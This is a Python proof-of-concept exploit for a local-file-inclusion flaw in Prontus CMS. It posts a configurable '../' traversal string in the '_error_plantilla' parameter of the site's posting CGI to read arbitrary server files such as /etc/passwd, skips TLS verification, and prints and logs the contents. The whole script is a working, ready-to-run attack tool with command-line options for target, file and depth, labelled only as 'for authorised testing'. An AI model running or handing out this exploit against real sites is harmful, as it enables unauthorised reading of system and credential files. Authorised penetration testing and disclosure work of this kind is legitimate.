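#!/usr/bin/python3
# isra
"""Prontus CMS local-file-inclusion proof of concept.

Posts to ``/cgi-bin/prontus_art_posting.cgi`` on the target with a
directory-traversal string in the ``_error_plantilla`` parameter and
prints/logs whatever the server sends back.  For authorised testing only.
"""
import re
import ssl
import argparse
import requests
from urllib import request, parse

# Seconds to wait on each request.  Without a timeout a non-responsive or
# tarpitting target blocks the script forever.
REQUEST_TIMEOUT = 15

# Number of "../" segments prepended to the requested file by default
# (matches the fixed ten-level payload the PoC originally used).
DEFAULT_DEPTH = 10


def _build_base_url(host, ssl):
    """Return ``scheme://host`` for *host*, using HTTPS when *ssl* is truthy."""
    scheme = "https" if ssl else "http"
    return "{}://{}".format(scheme, host)


def _traversal_payload(file, depth):
    """Return *file* prefixed with *depth* ``../`` segments.

    A leading slash on *file* is dropped so that ``/etc/passwd`` becomes
    ``../../etc/passwd`` rather than ``../..//etc/passwd``; both resolve to
    the same path, the former is just the cleaner request.
    """
    return "../" * depth + file.lstrip("/")


def check_lfi(host, file, prontus_id, idf, ssl, depth=DEFAULT_DEPTH):
    """Probe *host* for the Prontus ``_error_plantilla`` LFI.

    Args:
        host: Target host (optionally ``host:port``), without a scheme.
        file: Path of the file to include, e.g. ``etc/passwd``.
        prontus_id: Value sent as ``_NP`` (Prontus site ID).
        idf: Value sent as ``_IDF`` (posting form ID).
        ssl: Truthy to use HTTPS.  NOTE: the parameter name shadows the
            ``ssl`` module inside this function; the module is not needed
            here, and the name is kept for caller compatibility.
        depth: Number of ``../`` segments in the traversal payload.

    Side effects: prints progress to stdout and appends the exchange to
    ``<host>.log`` in the current directory.  Always returns ``None``;
    invalid IDs and network failures are reported, not raised.
    """
    print("[+] Starting...")
    base = _build_base_url(host, ssl)
    url_cgi = "{}/cgi-bin/prontus_art_posting.cgi".format(base)
    probe = {"_NP": prontus_id, "_IDF": idf}
    payload = dict(probe, _error_plantilla=_traversal_payload(file, depth))

    # The log name uses the raw host argument (no scheme), as before.
    # Responses are untrusted and may contain arbitrary bytes, so write the
    # log as UTF-8 with replacement instead of relying on the locale codec.
    with open("{}.log".format(host), "a+", encoding="utf-8",
              errors="replace") as log_file:
        log_file.write("\nChecking host {}\n".format(host))
        try:
            # verify=False is deliberate for a PoC: targets frequently run
            # self-signed or mismatched certificates.  Do not copy this into
            # tooling that sends credentials.
            print("[+] Checking Prontus ID and Form ID params.")
            req = requests.post(url_cgi, probe, verify=False,
                                timeout=REQUEST_TIMEOUT)
            # The CGI answers with this Spanish error text when the site
            # or form ID is unknown; nothing further is worth sending then.
            if "Error en los datos enviados" in req.text:
                print("[-] Prontus ID or Form ID not valid. Exiting...\n")
                return

            print("[+] Sending payload & parsing content...\n")
            req = requests.post(url_cgi, payload, verify=False,
                                timeout=REQUEST_TIMEOUT)
        except requests.RequestException as exc:
            # Connection refused, DNS failure, timeout, TLS error, ...
            msg = "[-] Request to {} failed: {}\n".format(url_cgi, exc)
            print(msg)
            log_file.write(msg)
            return

        # Echo the reply to the terminal and to the log, as the PoC did.
        print("Got reply from {}:\n".format(base))
        print("{}\n".format(req.text))
        log_file.write("Got reply from {}:\n".format(base))
        log_file.write("{}\n".format(req.text))


def main():
    """Parse the command line, print a banner and run the probe once."""
    parser = argparse.ArgumentParser()
    parser.add_argument("host", help="Target host")
    parser.add_argument("file", help="Local file to include")
    parser.add_argument("--prontus", default="nivel4",
                        help="Target Prontus ID")
    parser.add_argument("--form", default="postingform",
                        help="Target form ID")
    parser.add_argument("--ssl", help="Enable SSL", action="store_true")
    parser.add_argument("--depth", type=int, default=DEFAULT_DEPTH,
                        help="Number of ../ segments in the traversal "
                             "payload (default: %(default)s)")
    args = parser.parse_args()

    print("#" * 80)
    print("\n***** Prontus CMS LFI PoC *****")
    print("[+] Host: {}".format(args.host))
    print("[+] File: {}".format(args.file))
    print("[+] Prontus ID: {}".format(args.prontus))
    print("[+] Form ID: {}".format(args.form))
    print("[+] SSL: {}".format(args.ssl))
    print("[+] Depth: {}".format(args.depth))

    check_lfi(args.host, args.file, args.prontus, args.form, args.ssl,
              depth=args.depth)


if __name__ == "__main__":
    main()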